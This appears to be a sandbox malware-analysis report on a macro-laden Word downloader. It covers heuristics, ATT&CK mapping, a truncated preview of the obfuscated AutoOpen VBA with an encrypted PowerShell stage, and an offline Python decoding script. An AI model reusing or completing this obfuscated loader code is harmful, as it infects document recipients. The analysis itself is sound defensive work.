Verdict: MALICIOUS
Risk Score: 224
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1140 Deobfuscate/Decode Files or Information
The sample is a malicious Office document containing VBA macros. An AutoOpen macro is present and calls CreateObject, indicating an attempt to instantiate a COM object and execute code as soon as the document is opened. The extracted 'macros.bas' module and the ClamAV detection 'Doc.Malware.Emodldr-10025032-0' strongly suggest this document is a downloader designed to fetch and execute a secondary payload through the macro. The specific payload or download URL is not directly discernible from the provided script excerpts due to obfuscation: the visible source is padded with arithmetic whose results are discarded (Cos/CDate/Sin expressions, divisions assigned to unused variables), and the payload is assembled from repeated calls to a helper hEVafj() whose body lies past the truncation point. Each call takes a string and two numeric arguments written as N + 9934 - 9934, i.e. the constant N, consistent with substring extraction. The string arguments are mostly base64 of UTF-16LE text, and the one assigned to NrVAKXqXbmA contains case-mangled PowerShell fragments ([Runtime.InteropServices.Marshal]::PtrToStringBSTR, ::SecureStringToBSTR) together with the literal 76492d1116743f0423413b16050a5345, which is the fixed header emitted by PowerShell's ConvertFrom-SecureString. This points to a PowerShell stage carried as a key-protected SecureString rather than a plain URL in the macro text. Two details of the findings below deserve a caveat: the carved macros.bas is clean in ClamAV even though the parent document hits the signature (the signature matches the container, not the decoded source), and the 'legacy WordBasic' heuristic states that no modern VBA project was recovered, which conflicts with the olevba extraction and should be read as a weak, generic finding.
Heuristics (8)
- ClamAV: Doc.Malware.Emodldr-10025032-0 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
- VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS: Document contains VBA macro code
- AutoOpen macro [high] OLE_VBA_AUTOOPEN: AutoOpen macro
- CreateObject call [high] OLE_VBA_CREATEOBJ: CreateObject call
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the OOXML DrawingML XML namespace URI found in any document with drawing markup; it is not a network indicator.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 46728 bytes |

SHA-256: 0fa8ddb0a690efd478f1f785e239cd9d7198ccb2deb653f0ce3b7af8dc0cc40c
Detection (ClamAV): No threats found
Obfuscation or payload: likely (carved artifact contains 22 long base64-like blobs)
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "NwnSZBq"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "UbqmEDHSjAq"
Sub KoNzWb(YcRCQ)
OpnLn = jRmdMc
Cos (75763 / CDate(94943 - Sin(73193)))
ssXkAK = (86768 / 27125)
mGDLw = 6779 / ZZpOU
tQJjY = BXjiX
Cos (82589 / CDate(68091 - Sin(47614)))
fLEwZu = (620 / 56153)
FnanDN = 14909 / NlzGb
liMtD = jUPitt
Cos (27038 / CDate(71900 - Sin(33916)))
Mtnjbl = (70141 / 28034)
WWzdz = 49157 / ErSON
wAwkX = tJzWGT
Cos (48677 / CDate(11620 - Sin(36672)))
sAwzZh = (11213 / 64116)
RFUpWT = 6883 / KwmjqN
End Sub
Function UKkjOWmc()
On Error Resume Next
uBzdmm = Khlah
Cos (82355 / CDate(26780 - Sin(64552)))
FKpFa = (84415 / 87712)
rcDtn = 9343 / iADsu
UvYFRa = hEVafj("zboANwAxADUAMwA4ADkAZQA5ADgANAA3ADUAYQA0ADcAOAAyAGIAMgBiADAAMQA4AGEAOQA0ADAAMCwC", 4 + 9934 - 9934, 74 + 9934 - 9934)
nKRznD = HjTvw
Cos (36353 / CDate(93223 - Sin(47528)))
jSCHp = (73214 / 20656)
NWcUvj = 75265 / mjSAX
cMOXz = SOGOl
Cos (77423 / CDate(59679 - Sin(91575)))
HNYwD = (16021 / 1242)
vYasiT = 81458 / pYuCo
rwZMmY = hEVafj("zDUANABkAGIANwA3ADAAMABiADEAOQA4ADYAOQAxADMAYgAxAGYAMgA4ADYAZgBiADUAZgBjADYAOQBlADMAZQBjAGQANwBkAGIANAA3ADMAZAA0ADMAZQBlAGYAYwA1AGE7CSDI", 2 + 9934 - 9934, 129 + 9934 - 9934)
sDfFI = bFRwm
Cos (47936 / CDate(51856 - Sin(31253)))
nmwbbT = (98216 / 43441)
jvQEv = 30343 / tWrUUR
AiQXZ = rpTmSL
Cos (20903 / CDate(59938 - Sin(64445)))
lbwTtL = (966 / 27471)
pZRcYz = 99265 / cBDOir
SsYrc = hEVafj("C,I2ADAAMwAzADAAYwBkADQAOQBkAGMAZgAyAGMANQA2AGQAYgBhAGIAZQBmADkAYQBjAGMAMABiADgANgA1AGMAYQBhAGEAMQAzAGQAMAAzADUAZABjADkAZQBjMqYQ", 4 + 9934 - 9934, 121 + 9934 - 9934)
PTKCMm = NLSRMG
Cos (53092 / CDate(32747 - Sin(80324)))
CrkBaM = (90436 / 75182)
didil = 4170 / KDZAwB
SkiTZ = EAXKZ
Cos (9802 / CDate(99141 - Sin(85810)))
mPzYu = (78155 / 58645)
CuVOSC = 59411 / MHUpAN
dEDiwksrWh = hEVafj("vCkmADMANABlAGMAZgA1AGUAMgAzADEANwBjADQAMgBkA7kFJd", 4 + 9934 - 9934, 42 + 9934 - 9934)
wWoKY = vRnSf
Cos (73810 / CDate(59866 - Sin(44953)))
haoujZ = (6577 / 87630)
zsRMzf = 6785 / ZIzBG
EjoKzz = MKVzU
Cos (12561 / CDate(46621 - Sin(61852)))
QzntS = (57676 / 56478)
wkYol = 57540 / ndvzkl
wsSUORK = hEVafj("F7kA1ADkAYwBjADcAYQAzADcAYwBmAGQAZQBjADcANAAwAGIAZgA pm1", 4 + 9934 - 9934, 49 + 9934 - 9934)
ZLETJ = fdraQI
Cos (25246 / CDate(16790 - Sin(97113)))
MaDYMO = (47844 / 65534)
hlKqLZ = 92619 / Pacpw
MlztEB = XXTfY
Cos (16319 / CDate(27789 - Sin(19205)))
JJdIE = (95066 / 35804)
nGjqm = 57659 / iGKiMP
NrVAKXqXbmA = hEVafj("kJCEs.MARshAl]::PTrTOsTrIngbSTR([RUNtIMe.INtEROpserVIcEs.MarshAL]::securEStRinGtObsTR( $('76492d1116743f0423413b16050a5345MgB8AHgAdgBHAHQANgB4AHIANwAyAFUANgBzAEsAbgB2AC8ANAA2ADQAaQVm13", 3 + 9934 - 9934, 178 + 9934 - 9934)
IvzVvZ = jMEOBm
Cos (61123 / CDate(64686 - Sin(7329)))
PTzGzU = (28434 / 72622)
sASzjz = 15571 / AiKiB
iizlBM = dpsQJ
Cos (25498 / CDate(25182 - Sin(12923)))
XkbLc = (65566 / 11534)
RQlHG = 64622 / jPzdt
ONshpwwPS = hEVafj("hQA0ADEAMABlAGUANgA4ADAAYgAyAGEAMgA5AGUAOQBkADQAOAA1ADQAYQAyADAAYQA4AGUANQA0AGYAMQAyAGQAYwBhADAANAB,p8azj", 2 + 9934 - 9934, 98 + 9934 - 9934)
tFwmwa = tCpFc
Cos (49718 / CDate(69333 - Sin(96955)))
XXAcu = (38472 / 70944)
vWHUjt = 25538 / NPdfcY
rQStB = mRmDM
Cos (61664 / CDate(99353 - Sin(20776)))
zUSpBH = (710 / 42022)
BjzaG = 41359 / aQwHsz
wjUYsXhZf = hEVafj("rZZABlADAAYwA2AGQAZABhADgAZgAwADYANQBjADMAMwAwAGQANQA2ADkANQBiAGQANQA4AwIa5", 4 + 9934 - 9934, 68 + 9934 - 9934)
pwjbzh = jUAsaP
Cos (78886 / CDate(99620 - Sin(71728)))
ruLsS
... (truncated)
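The triage pass the summary describes, as an added example that is not part of the report or the sample: fold the `N + 9934 - 9934` arithmetic, cut the windows the folded arguments describe, and look for base64-encoded UTF-16LE text inside them. The body of hEVafj() is not in the excerpt, so the only assumption made is that it returns a substring of its first argument; because it is unknown whether its second argument is 0- or 1-based, both windows are tried and every base64 start offset inside them is scanned rather than guessed. The three calls in SAMPLE_VBA are copied from the preview above; the marker names and the helper function names are the example's own.

```python
"""Offline triage pass over the obfuscated VBA preview (added example; not the analyzer's
or the sample's own code). Assumption: hEVafj(text, a, b) returns a substring of `text`."""
import base64
import re
import string

# Constructed input: three hEVafj() calls copied verbatim from the preview.
SAMPLE_VBA = r'''
UvYFRa = hEVafj("zboANwAxADUAMwA4ADkAZQA5ADgANAA3ADUAYQA0ADcAOAAyAGIAMgBiADAAMQA4AGEAOQA0ADAAMCwC", 4 + 9934 - 9934, 74 + 9934 - 9934)
Cos (36353 / CDate(93223 - Sin(47528)))
SsYrc = hEVafj("C,I2ADAAMwAzADAAYwBkADQAOQBkAGMAZgAyAGMANQA2AGQAYgBhAGIAZQBmADkAYQBjAGMAMABiADgANgA1AGMAYQBhAGEAMQAzAGQAMAAzADUAZABjADkAZQBjMqYQ", 4 + 9934 - 9934, 121 + 9934 - 9934)
NrVAKXqXbmA = hEVafj("kJCEs.MARshAl]::PTrTOsTrIngbSTR([RUNtIMe.INtEROpserVIcEs.MarshAL]::securEStRinGtObsTR( $('76492d1116743f0423413b16050a5345MgB8AHgAdgBHAHQANgB4AHIANwAyAFUANgBzAEsAbgB2AC8ANAA2ADQAaQVm13", 3 + 9934 - 9934, 178 + 9934 - 9934)
'''

CALL_RE = re.compile(r'hEVafj\("([^"]*)"\s*,\s*([^,]+?)\s*,\s*([^)]+?)\s*\)')
B64_RUN = re.compile(r'[A-Za-z0-9+/]{8,}')
PRINTABLE = set(string.printable) - set('\t\n\r\x0b\x0c')

# Literal strings worth flagging. The 32-hex header is the fixed prefix emitted by
# PowerShell's ConvertFrom-SecureString (a known constant, not taken from the report).
MARKERS = {
    'ConvertFrom-SecureString header': r'76492d1116743f0423413b16050a5345',
    'Marshal::SecureStringToBSTR': r'SecureStringToBSTR',
    'Marshal::PtrToStringBSTR': r'PtrToStringBSTR',
}


def fold_int(expr):
    """Fold a VBA integer expression built only from literals, + and - ('4 + 9934 - 9934' -> 4)."""
    if not re.fullmatch(r'[\s\d+-]+', expr):
        raise ValueError(f'not a plain integer expression: {expr!r}')
    return sum(-int(n) if sign == '-' else int(n)
               for sign, n in re.findall(r'([+-]?)\s*(\d+)', expr))


def extract_calls(vba_text):
    """Return (string, start, length) for every hEVafj() call, with the arithmetic folded."""
    return [(s, fold_int(a), fold_int(b)) for s, a, b in CALL_RE.findall(vba_text)]


def decode_utf16_b64(chunk, min_chars=6):
    """Longest fully printable UTF-16LE text recoverable from base64 inside `chunk`.

    Each base64-alphabet run is tried from every start offset (junk prefixes such as
    'zbo' and quartet misalignment both shift the start) and at both byte parities
    (a window may begin on the high byte of a UTF-16 code unit)."""
    best = ''
    for run in B64_RUN.findall(chunk):
        for offset in range(len(run)):
            body = run[offset:]
            body = body[:len(body) - len(body) % 4]
            if len(body) < 8:
                break
            raw = base64.b64decode(body)
            for parity in (0, 1):
                even = raw[parity:]
                text = even[:len(even) - len(even) % 2].decode('utf-16-le', errors='replace')
                if len(text) >= min_chars and len(text) > len(best) and all(c in PRINTABLE for c in text):
                    best = text
    return best or None


def triage(vba_text):
    """Fold, slice (0- and 1-based windows), decode, and flag known markers for each call."""
    findings = []
    for s, start, length in extract_calls(vba_text):
        lo = max(start - 1, 0)
        windows = {s[start:start + length], s[lo:lo + length]}
        decoded = max((decode_utf16_b64(w) or '' for w in windows), key=len) or None
        haystack = s + ' ' + (decoded or '')
        findings.append({
            'start': start, 'length': length, 'decoded': decoded,
            'markers': [name for name, pat in MARKERS.items() if re.search(pat, haystack, re.I)],
        })
    return findings


if __name__ == '__main__':
    for i, f in enumerate(triage(SAMPLE_VBA), 1):
        print(f"call {i}: start={f['start']} len={f['length']} decoded={f['decoded']!r} markers={f['markers']}")
```

On these three calls the first two windows decode to runs of lowercase hex digits, and the third yields the text following the SecureString header, which is what a key-protected ConvertFrom-SecureString blob split into chunks looks like before the macro reassembles it. The decoded fragments are pieces of the encrypted stage, not the URL, so this pass confirms the staging technique without overclaiming the payload.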